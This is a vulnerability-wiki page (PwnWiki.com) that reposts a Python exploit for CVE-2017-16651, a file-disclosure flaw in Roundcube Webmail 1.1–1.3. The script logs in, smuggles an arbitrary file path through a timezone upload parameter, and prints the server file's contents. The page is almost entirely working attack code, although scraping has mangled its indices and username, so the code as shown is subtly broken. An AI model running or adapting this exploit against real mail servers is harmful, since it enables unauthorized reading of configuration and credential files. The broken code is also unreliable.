免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
EXP
# Exploit Title: Roundcube Webmail 1.2 - File Disclosure # Date: 09-11-2017 # Exploit Author: stonepresto # Vendor Homepage: https://roundcube.net/ # Software Link: https://sourceforge.net/projects/roundcubemail/files/roundcubemail-beta/1.2-beta/ # Version: 1.1.0 - 1.1.9, 1.2.0 - 1.2.6, 1.3.0 - 1.3.2 # Tested on: roundcube version 1.2-beta # CVE : CVE-2017-16651 #!/usr/bin/env python3 # Reference: https://gist.github.com/thomascube/3ace32074e23fca0e6510e500bd914a1 # https://github.com/stonepresto/CVE-2017-16651 # Exploit Author: stonepresto import requests import re import sys URL="https://127.0.0.1/" USER="email protected" PASS="password" def main(): s = requests.Session() r = s.get(URL,params={"_task":"login"},verify=False) token = None for line in r.text.split("\n"): if 'name="_token"' in line: token = line.split("value=")1.split('"')1 print("+ token: %s" % token) if token is None: print("! unable to retrieve token") sys.exit(1) data = { "_token":token, "_task":"login", "_action":"login", "_timezonefiles1path":sys.argv1, "_url":"_task%3Dlogin", "_user":USER, "_pass":PASS } r = s.post(URL,params={"_task":"login"},data=data,verify=False) params = { "_task":"settings", "_action":"upload-display", "_from":"timezone", "_file":"rcmfile1" } r = s.get(URL,params=params,verify=False) print(r.text) if __name__ == "__main__": if len(sys.argv) != 2: print("! Usage: %s <file-to-read>" % sys.argv0) else: main()
免费、自由、人人可编辑的漏洞库--PwnWiki.com
